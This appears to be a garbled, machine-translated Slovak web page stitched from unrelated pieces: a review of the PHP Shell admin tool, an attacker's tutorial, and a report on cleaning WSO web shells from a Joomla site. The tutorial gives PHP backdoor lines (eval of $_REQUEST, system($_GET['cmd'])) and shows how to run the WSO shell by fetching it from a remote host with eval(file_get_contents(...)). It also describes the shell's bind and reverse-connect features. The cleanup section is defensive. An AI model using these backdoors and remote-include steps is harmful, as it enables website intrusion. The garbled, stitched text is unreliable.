Nedávno som na obrovských priestoroch internetu narazil na zmienku o „ PHP Shell“. Pred pár rokmi mi táto utilita veľmi pomohla a teraz chcem zaplatiť akýsi dlh jej vývojárovi Martinovi Geislerovi (http://mgeisler.net/).
Aký je účel „PHP Shell“? Verím, že každý "pokročilý" webový programátor, nehovoriac o sysadminoch, sa stretol a používal SSH. SSH nám umožňuje získať vzdialený prístup na server a spúšťať na ňom príkazy shellu (dobre, existujú rôzne druhy príkazov, ako je prechádzanie adresármi tam a späť, hore a dole, presúvanie, mazanie a kopírovanie súborov, spúšťanie skriptov a najrôznejších dômyselných pomôcok), ako keby kábel k vášmu monitoru systémový blok sa predĺžil na neuveriteľnú veľkosť a dosiahol toľko, ako hostiteľský server. Musím povedať, že je možné tunelovať cez ssh a X-graphics, obrázok pracovnej plochy zobrazujúci spustenie okenné aplikácie, ale toto zjavne nie je pre webové servery.
Jedným slovom, ak nemáte SSH na svojom hostingu, potom "čo je zlé v dánskom kráľovstve." Nevýhodou je, že SSH je na vašej „čerstvej“ stránke často predvolene vypnuté a dohadovanie sa s tímom podpory, aby ssh fungovalo, trvá nejaký čas. Presne to sa stalo v ten vzdialený zimný večer. Potreboval som urgentne preniesť miesto z jedného stroja na druhý, pri čom sa vyskytli problémy, a zvyčajne som siahol po skratke tmelu na ploche, aby som videl, čo je „vo vnútri“ pacienta. Ojoj... a podpora ssh nie je povolená. Ako byť? Ak ste dosť sofistikovaní v programovaní v nejakom jazyku, potom nebude ťažké napísať malý skript, ktorý implementuje požadovanú úlohu. Otvoril som google a po prejdení niekoľkých odkazov som našiel zmienku o PHP Shell. Jedným slovom som išiel domov načas.
Pravdupovediac, mal som veľké šťastie, že som mal dosť orezaných funkcií shellu, ktoré mi PHP Shell dal – stále je to jeho napodobenina.
PHP Shell vo svojom jadre používa funkciu php - proc_open. Táto funkcia spustí nejaký príkaz a otvorí vstupno-výstupné prúdy, aby sa do aplikácie vložili nejaké informácie (simuluje sa manuálne zadávanie, ako keby to bolo na klávesnici) a zobrazili sa výsledky práce (ak viete, čo sú potrubia, potom sme hovoriť o nich). V skutočnosti je funkcia proc_open vylepšenou a rozšírenou verziou exec alebo systémových funkcií. Tie však program iba spustili a nedali možnosť interakcie s ním, mali by ste mať ihneď v parametroch príkazový riadok zadajte všetky údaje potrebné na to, aby príkaz fungoval. proc_open vám umožňuje vytvárať potrubia spojené s vaším php skriptom a podľa toho môžete simulovať vstup do programu a čítať výsledky jeho práce. Pre milencov bezplatný hosting Hneď poviem:
"NIE, NEMÔŽETE PRÍSTUP K SSH POMOCOU PHP Shell."
Faktom je, že pre bezplatný alebo veľmi lacný hosting je zvykom spúšťať php v safe_mode. Deaktivuje množstvo funkcií vrátane proc_open.
"NIE, S PHPSHELL NEMÔŽETE PRACOVAŤ S INTERAKTÍVNYMI PROGRAMMI."
Samotná podstata webu nám hovorí, že na vzdialenom serveri nie je možné spustiť nejaký program, ktorý by naďalej fungoval a umožňoval by nám zadávať a vypisovať dáta počas niekoľkých samostatných http požiadaviek.
"NIE, NEMÁTE PRÍSTUP K VŠETKÝM PROGRAMOM, SÚBOROM A ZLOŽKÁM NA SERVERI."
Skript funguje buď v mene apache a potom sú jeho možnosti obmedzené iba tým, na čo má účet apache práva. Alebo ak sa na hostingu používa suexec (http://en.wikipedia.org/wiki/SuEXEC), potom sa vaše práva budú zhodovať s právami účtu z ktorého sa spúšťa php skript.
Predpokladajme, že vás to nezastavilo a archív ste si stiahli a rozbalili na vašom serveri do priečinka, povedzme phpshell. Ak do panela s adresou prehliadača zadáte „niečo-je-vaša-stránka/phpshell/phpshell.php“, budete vyzvaní, aby ste sa predstavili, zadali meno a heslo – samozrejme, toto nie sú prihlasovacie údaje, ktoré prijaté od vášho hostiteľa
Takže musíte nastaviť povolenia: kto môže pristupovať k shellu cez tento nástroj. Ak to chcete urobiť, v súbore config.php nájdite sekciu používateľov a pridajte do nej používateľské meno a heslo v nasledujúcom tvare:
Vasyano=tajomstvo
Ak ste zmätení skutočnosťou, že heslo je nastavené ako čistý text, potom pomocou súboru pwhash.php môžete zistiť záhyb hesla md5 a uloží sa do súboru config.php
Teraz sa skúsime znova prihlásiť a dostať sa do okna, kde v spodnej časti okna zadáme príkaz, klikneme na „spustiť“ a následne sa výsledok jeho vykonania zobrazí v strede okna stránky
To je všetko, možno ti nejako pomôže phpshell.
Nie tento článok, ale mnohé budú užitočné. Takže sme sa dostali do administračného panela, nakoniec sme mohli niekde vložiť nasledujúci kód, napríklad:
if (isset($_REQUEST["e"])) eval(stripslashes($_REQUEST["e"]));
alebo jednoducho:
tvrdiť(stripslashes($_REQUEST));
stripslashes v tomto prípade iba na obídenie magic_quotes=ON
veľa vložiť
systém($_GET["cmd"])
A ďalšie nehoráznosti, ale to všetko je zbytočné, v skutočnosti je všetko jednoduchšie. Tak si vložil daný kód niekde (vo faq.php, alebo už máte len také zadné vrátka niekde v útrobách serverových skriptov).
Tie. na konci ste napríklad dosiahli výkonnosť nasledujúceho odkazu:
http://localhost/user.php?e=phpinfo();
A potom má veľa začiatočníkov stupor. Hneď ďalšia otázka je, čo robiť ďalej?
A pozrime sa bližšie na toto phpinfo, ktoré nám prinieslo hlavné dva body, ktoré nás v tejto situácii budú zaujímať:
allow_url_fopen
allow_url_include
allow_url_include
Áno, cín, samozrejme, ale spravidla vypnutý.
Zvyšky
A on spravidla = ON. Ako môžeme využiť túto, adminom nerozvážne opustenú príležitosť, aby sme sa príliš netrápili (nehľadať priečinky, do ktorých sa dá zapisovať a zisťovať podobné nezmysly a nenapĺňať škrupinu ako takú, ale liezť na server, ako keby škrupina je už zaplavená). Áno, veľmi jednoduché. Ak
allow_url_fopen = ON
A máte kód, ktorý zobrazuje aspoň to, že ste si už prečítali všetky konfigurácie, zlúčili všetko, čo potrebujete, atď. (nezamieňajte s "kaziť", len to, čo sa dá prečítať)
Od vážených berieme poslednú šupku aleboRb, odstráňte prvý riadok:
+
vymazať posledné
+
heslo môžete vymazať, škrupinu nevypĺňame, len ho bez opustenia použijeme
uložiť do ľubovoľného hostiteľa ako bla_bla.txt(rovnaký narod.ru je celkom vhodný) alebo vo forme obrázka v službe hostenia súborov, ktorá poskytuje priame odkazy na stiahnutie obsahu a zadanie nasledujúcej požiadavky:
kód:
http://localhost/user.php?a=eval(file_get_contents("http://site.ru/bla_bla.txt"));
Všetky. Máte plnohodnotný shell bez jeho fyzického nahrávania na server so všetkými obvyklými funkciami shellu. Ďakujem za tvoju pozornosť
PS: testované na WSO2.4 ( wso2_pack.php)
Popis škrupiny:
Autorizácia
Informácie o serveri
Správca súborov (Kopírovanie, premenovanie, presúvanie, mazanie, chmod, dotyk, vytváranie súborov a priečinkov)
Prezerajte, hexzobrazujte, upravujte, sťahujte, nahrávajte súbory
Práca s archívmi zip (balenie, rozbaľovanie)
Konzola
SQL manažér (MySql, PostgreSql)
Spustenie kódu PHP
Práca s reťazcami + vyhľadávanie hashov v online databázach
Bindport a spätné pripojenie (Perl)
Hľadanie textu v súboroch
*nix/windows
Z čipsov
Anti-search engine (skontrolovaný User-Agent, ak vyhľadávač, potom sa vráti chyba 404)
Konzola si pamätá zadané príkazy. (môžete sa v nich pohybovať pomocou šípok nahor a nadol, keď zaostríte na vstupné pole)
Môžete použiť AJAX
Nízka hmotnosť (24,32 kB)
Výber kódovania, v ktorom funguje shell.
Táto utilita poskytuje webové rozhranie pre vzdialenú prácu s operačným systémom a jeho službami/démonmi.
Použitie tohto produktu na nelegálne účely je trestným činom.
Archív obsahuje najnovšiu verziu shellu a malý nástroj WSOmanager na prácu s shellmi.
Stiahnite si shell:
Zistil sa škodlivý skript PHP shell WSO /libraries/simlepie/idn/OpenIDOpenID.php (stránka Joomla! 3). Momentálne detekované iba niektorými antivírusmi ako JS/SARS.S61, PHP:Decode-DE, Trojan.Html.Agent.vsvbn, PHP.Shell.354, php.cmdshell.unclassed.359.UNOFFICIAL.
V jeden „krásny“ (je to ako niekto) deň dostal jeden z našich zverencov (http://ladynews.biz), ako výsledok skenovania jeho stránky pomocou hostiteľského antivírusu, nasledujúcu správu:
V účte sa našli súbory so škodlivým obsahom. Dôrazne odporúčame obmedziť prístup k vášmu FTP účtu iba z IP adries, ktoré používate, a tiež použiť antivírusovú ochranu na kontrolu vášho účtu na vírusy. Pozrite si tipy na zabezpečenie a hackovanie, ktoré vám pomôžu zabrániť opätovnej infekcii.
Samozrejme, bolo navrhnuté vysporiadať sa s touto hanbou - skenovanie bežným antivírusom ClamAV so sadou antivírusových databáz štandardne neprinieslo žiadne ďalšie výsledky.
Na začiatku tohto príbehu (2015-10-23) tento skript vírusového shellu chýbal v antivírusových databázach väčšiny antivírusov, vrátane takých „monštier“ ako Comodo, DrWeb, ESET-NOD32, GData, Kaspersky, McAfee, Microsoft, Symantec, TrendMicro a pod., čo potvrdil aj online skener dňa 23.10.2015 VirusTotal. Len niekoľko antivírusov dokázalo odhaliť škodlivý PHP skript:
Antivírus Dátum aktualizácie výsledku AhnLab- V3 JS/ SARS. S61 20151022 Avast PHP: Decode- DE [Trj] 20151023 NANO- Antivirus Trojan. html. agent. vsvbn20151023
V ten istý deň boli ClamAV a Dr.Web upozornené na zistenie škodlivého skriptu. ClamAV stále zaryto mlčí a Dr.Web na škodlivý balík zareagoval do 24 hodín:
Vaša žiadosť bola analyzovaná. Príslušný záznam bol pridaný do vírusovej databázy Dr.Web a bude dostupný počas ďalšej aktualizácie.
Hrozba: PHP.Shell.354
Dr.Web dodržal svoj sľub a vírusový scenár OpenIDOpenID.php je teraz definovaný ako PHP.Shell.354, o tom však ešte stále netušia mnohé antivírusy ako ClamAV, Comodo, DrWeb, ESET-NOD32, GData, Kaspersky, McAfee, Microsoft, Symantec, TrendMicro atď.
OK, súbor sme odstránili, ale na ako dlho? Odkiaľ pochádza, môžeme len špekulovať. Čo bude ďalej? Začíname inštalovať najrôznejšie komponenty Securitycheck a prekrúcame pravidlá v .htaccess, ktoré zakazujú prístup ku všetkému a všetkému, pretože na zdieľanom hostingu (aka zdieľaný hosting, zdieľaný hosting) nemáme žiadnu právomoc. Ako dlho tieto opatrenia zachránia, nikto nevie.
Keď už hovoríme o všetkých druhoch komponentov Securitycheck... Bezpečnostná kontrola je komponent pre Joomla! a celkom dobre. A tu je " Antivírusová ochrana webových stránok"Úplné svinstvo, ktoré nikomu neodporúčam používať, tu je praxou overená recenzia tejto "Antivírusovej ochrany webových stránok":
Tento komponent tiež vytvorí súbor pack.tar vo vašom /tmp, ktorý obsahuje vaše configuration.php a všetky ďalšie nájdené heslá! BUĎTE VEDOMÍ
Čo v preklade znamená: "tento komponent vytvára aj záložnú kópiu celej stránky v súbore /tmp/pack.tar, ktorý obsahuje configuration.php s heslami z databázy! POZOR" - to znamená, že "Ochrana webu" z r. tento komponent a nezapácha, čo by malo obeť viesť aj k zamysleniu sa nad zmenou ciest k adresárom /logs , /tmp , /cache a odmietnutím prístupu k nim.
Ideme okolo tento odkaz Dá sa pochopiť, že problém je starý minimálne rok. Hľadám tu pochopme, že shell skript nebol maskovaný zložitým base64_encode/gzdeflate , čo znamená, že niekde inde musí byť časť, ktorá volá/spája OpenIDOpenID.php a vykonáva base64_decode/gzinflate . OpenIDOpenID.php je teda iba výsledkom (aka dôsledok), a nie dôvodom, kedy sa obeť sťažuje, že zo servera sa začal odosielať spam v priemyselnom meradle a nepomohlo ani manuálne odstránenie škodlivých súborov, po ktorom obeť sa sťažuje okrem toho, že NIC-RU hosťuje nikoho iného. „Deravý“ virtuálny hosting môže byť veľmi dobrý. aj casto tam IMHO ludia pracuju pre plat, a nie pre napad, ale v niektorych pripadoch moze byt problem ovela hlbsi.
Tu napríklad" V súbore Adobe Flash bol zistený škodlivý injektor iFrame". Myslím, že pre nikoho nie je tajomstvom, že môžete písať rozhrania na nahrávanie súborov na stránky vo flashi a robiť mnoho ďalších zaujímavých vecí v jazyku ActionScript. Vírus v súboroch .swf (Adobe Flash), ako ukázala prax, môže zostať roky nepovšimnutý a byť čiernymi dverami na stránke ( alias zadné vrátka - zadné dvierka), cez ktoré sa „vyhadzujú“ súbory ako „OpenIDOpenID.php“, ktoré je možné zmazať, kým nezmodriete v tvári a bez výsledku.
Čo robiť, ako nájsť „slabý odkaz“ medzi tisíckami súborov? Na to je potrebné použiť takzvanú heuristickú analýzu a v niektorých prípadoch použiť antivírusové databázy tretích strán. Malo by sa vziať do úvahy, že heuristická analýza môže v závislosti od jej nastavení poskytnúť veľa falošných poplachov ako pri použití ďalších vírusových podpisov od vývojárov tretích strán.
Kde môžem získať antivírusové databázy tretích strán? Napríklad databázy s antivírusovými signatúrami od vývojárov tretích strán pre ClamAV si môžete bezplatne stiahnuť z nasledujúcich adries: www.securiteinfo.com, malwarepatrol.net, rfxn.com. Ako používať tieto dodatočné antivírusové databázy? Toto bude úplne iný príbeh. Môžeme len povedať, že ďalšie antivírusové databázy pre ClamAV z rfxn.com ( Projekt LMD (Linux Malware Detect).) sú zamerané na vyhľadávanie škodlivého softvéru konkrétne vo webových aplikáciách a poskytujú lepšie výsledky. rfxn.com tiež uvádza, že 78 % hrozieb, ktorých odtlačky sú obsiahnuté v ich databáze, nie je detekovaných viac ako 30 komerčnými antivírusmi – a s najväčšou pravdepodobnosťou sú.
Takže... Ako sa skončil príbeh so škodlivým PHP shell skriptom OpenIDOpenID.php?
Bolo rozhodnuté zásobiť sa ďalšími antivírusovými databázami pre ClamAV z malwarepatrol.net a rfxn.com, stiahnuť záložnú kópiu súborov lokality a skenovať ich lokálne, tu je výsledok kontroly:
$ clamscan / ladynews.biz / ../ game_eng.swf: MBL_647563.UNOFFICIAL FOUND / ../ farmfrenzy_pp_eng.swf: MBL_647563.UNOFFICIAL FOUND / ../ beachpartycraze_eng.swf.wf.wFIAL.UNICOFF /4225.29ly3lux: MBL_647563.UNOFFICIAL FOUND / ../ loader_eng.swf: MBL_647563.UNOFFICIAL FOUND ----------- SÚHRN SKENOVANIA ----------- Známe vírusy: 4174348 Verzia motora: 0.98.7 Skenované adresáre: 3772 Skenované súbory: 18283 Infikované súbory: 5 Celkový počet chýb: 1 Skenované údaje: 417,76 MB Prečítanie údajov: 533,51 MB (pomer 0,78 :1 ) Čas: 1039,768 sek (17 m 19 s)
/libraries/simlepie/idn/OpenIDOpenID.php ako vyššie uvedené súbory .swf boli odstránené, ale je problém vyriešený? Aj keď je ťažké povedať, ideme ďalej ...
Z dešifrovanej verzie súboru /libraries/simlepie/idn/OpenIDOpenID.php(http://pastebin.com/WRLRLG9B) pohľadom na konštantu @define("WSO_VERSION", "2.5"); , je zrejmé, že ide o druh produktu nazývaného WSO. Po malom hľadaní v sieti pre kľúčové slovo WSO sa získali nasledujúce výsledky:
Ukazuje sa, že téma už dlho nie je nová, takže berieme regexxer do zubov, pokračujeme v kopaní súborov lokality a nájdeme: Chyba pri otváraní adresára "/home/user/libraries/joomla/cache/controller/cache" : Prístup zamietnutý
Áno, tu máš, kde inde to bolelo! Pozeráme sa na práva k adresáru, ktoré by predvolene nemali byť = chmod 111 (aka Run for Owner / Group / Everyone). Niekde teda niečo sedí a šíri sa cez katalógy a skrýva sa aj pred vírusmi s chmods 111.
Po nastavení chmod 551 pre adresár a pri pohľade dovnútra sa tam našiel /libraries/joomla/cache/controller/cache/cache/langs.php, ktorého zdrojový kód je zverejnený tu: http://pastebin.com/JDTWpxjT - adresár /libraries/joomla/cache/controller/cache vymazať.
Skvelé, teraz umiestnime chmods na všetky súbory a adresáre v poradí:
# hromadná zmena práv (chmod) na súbory v adresári ./dirname a nižšie find / home/ user/ public_html -type f -exec chmod 644 ( ) \; # hromadná zmena oprávnení (chmod) na /dirname a nižšie find / home/ user/ public_html -type d -exec chmod 755 ( ) \;
Ešte raz zopakujeme antivírusovú kontrolu s ďalšími databázami clamscan /ladynews.biz, ale vraj je všetko čisté.
Zopakujeme hľadanie súborov pomocou regexxer a pokúsime sa vyhľadať kľúčové slová OpenIDOpenID, OpenID alebo WSO - a prídeme na to, že to peklo je oveľa širšie a hlbšie:
- - tu by to nemalo byť, tu je jeho zdroj: http://pastebin.com/jYEiZY9G
- /administrator/components/com_finder/controllers/imagelist.php- tu by to nemalo byť, tu je jeho zdroj: http://pastebin.com/0uqDRMgv
- /administrator/components/com_users/tables/css.php- tu by to nemalo byť, tu je jeho zdroj: http://pastebin.com/8qNtSyma
- /administrator/templates/hathor/html/com_contact/contact/toolbar.trash.html.php- tu by to nemalo byť, tu je jeho zdroj: http://pastebin.com/CtVuZsiz
- /components/com_jce/editor/tiny_mce/plugins/link/img/Manager.php- tu by to nemalo byť, tu je jeho zdroj: http://pastebin.com/2NwTNCxx
- /libraries/joomla/application/web/router/helpsites.php- tu by to nemalo byť, tu je jeho zdroj: http://pastebin.com/ANHxyvL9
- /plugins/system/ytshortcodes/XML.php- tu by to nemalo byť, tu je jeho zdroj: http://pastebin.com/GnmSDfc9
- /templates/index.php - tu by to nemalo byť, tu je jeho zdroj: http://pastebin.com/gHbMeF2t
/administrator/components/com_admin/index.php a /templates/index.php boli pravdepodobne vstupné skripty, ktoré spúšťali hlavný kód s vysoko zastaranou funkciou eval(), ktorá tiež používala:
No, logika maskovania škodlivého kódu je jasná. Ak teraz hľadáme konštrukt "eval($ ", nájdeme oveľa viac zaujímavých vecí:
- /administrator/components/com_admin/sql/updates/postgresql/php.php- http://pastebin.com/gRHvXt5u
- /components/com_kunena/template/blue_eagle/media/iconsets/buttons/bluebird/newsfeed.php -
- /components/com_mailto/helpers/index.php -
- /components/com_users/views/login/file.php -
- /components/com_users/controller.php- infikovaný a je potrebné ho vymeniť!,
- /includes/index.php -
- /libraries/joomla/string/wrapper/section.php -
- /libraries/legacy/access/directory.php -
- /libraries/nextend/javascript/jquery/InputFilter.php -
- /libraries/nextend/smartslider/admin/views/sliders_slider/tpl/config_tinybrowser.php -
- /libraries/xef/assets/less/admin.frontpage.php -
- /media/editors/codemirror/mode/rust/Alias.php -
- /modules/mod_kunenalatest/language/zh-TW/smtp.php -
- /modules/mod_kunenalogin/language/de-DE/XUL.php -
- /plugins/content/jw_allvideos/jw_allvideos/includes/js/mediaplayer/skins/bekle/CREDITS.php -
- /templates/sj_news_ii/html/mod_sj_contact_ajax/toolbar.messages.php -
Nie všetky vírusové PHP skripty boli zverejnené na pastebin.com, pretože je povolených iba 10 publikácií v priebehu 24 hodín. Vo všeobecnosti je postup odstránenia približne nasledujúci:
Áno, skoro by som zabudol - predtým, ako začnete odstraňovať škodlivé skripty, nezaškodí pridať do .htaccess niekoľko pravidiel, ktoré zakazujú priamy prístup k akýmkoľvek súborom .php v ľubovoľných adresároch, ale umožňujú prístup iba ku koreňovým súborom / alebo /index .php a /administrator/ alebo /administrator/index.php - toto zabráni útočníkovi v prístupe k prichádzajúcim skriptom shellu skrytým v rôznych systémových adresároch:
UPD 2015-10-28: No, čo? Už ste sa uvoľnili? Je príliš skoro...
Teraz sa pozrime v divočine súborov lokality na binárne súbory, ktoré by v motore vôbec nemali byť:
find / mypath/ -spustiteľný súbor -type f find / mypath/ -type f -perm -u+x find / mypath/ -type f | súbor xargs | grep "\:\ *data$"
Kto hľadá, vždy nájde (binárne súbory):
- /modules/mod_p30life_expectancy_calc/tmpl/accordian.pack.js
- /images/stories/audio/34061012-b1be419af0b9.mp3
- /libraries/xef/sources/folder/navigation.php
- /libraries/joomla/application/web/application.php
- /libraries/joomla/document/json/admin.checkin.php
- /libraries/nextend/assets/css/LICENSE.php
- /libraries/fof/config/domain/toolbar.categories.html.php
- /libraries/fof/form/field/client.php
- /libraries/phputf8/sysinfo_system.php
- /components/com_mobilejoomla/index.php
- /components/com_mobilejoomla/sysinfo_system.php
- /components/index.php
- /components/com_banners/sysinfo_config.php
- /components/com_kunena/views/home/admin.checkin.php
- /components/com_jce/editor/tiny_mce/plugins/source/js/codemirror/toolbar.checkin.php
- /components/com_jce/editor/tiny_mce/plugins/colorpicker/admin.cache.php
Poďme si to zhrnúť
Nebolo možné spoľahlivo určiť, odkiaľ vyrástli nohy tejto infekcie – či je na vine nedávno zistená kritická zraniteľnosť v motore, ktorá umožňuje vstrekovanie SQL a eskaláciu privilégií, alebo vyššie uvedené označené ako škodlivé súbory .swf, alebo ktorá jeden doteraz nebol objavený Existuje zraniteľnosť v niektorom z komponentov alebo doplnkov tretích strán alebo dierovaný virtuálny web hosting - otázka zostáva otvorená?
Momentálne sú odhalené škodlivé súbory vyčistené, súbory enginu kompletne nanovo nahrané, barikády vybudované v pravidlách .htaccess... Kto má čas a kto má záujem dať dokopy a prekopať túto kopu hovno môže stiahnuť archív wso-php-shell-in-joomla.zip- sú tam zabalené všetky škodlivé súbory PHP uvedené vyššie, heslo do archívu je: www.website
CELKOM: Nikdy nie je príliš veľa paranoje a akýkoľvek bezplatný alebo komerčný antivírus so svojou heuristikou spolu s ďalšími databázami podpisov nie je ani zďaleka všeliekom. Preto je akýkoľvek antivírus zastaraný nástroj na ochranu aktívneho prostredia pre viacerých používateľov a na zabránenie rôznym neznámym hrozbám by sa mali používať metódy paranoidnej ochrany, napríklad: virtualizácia, SELinux, Bastille Linux, nemenný bit, ecryptfs atď!
- Hrozba: WSO PHP Web Shell
- Obeť: ladynews.biz
Načítava...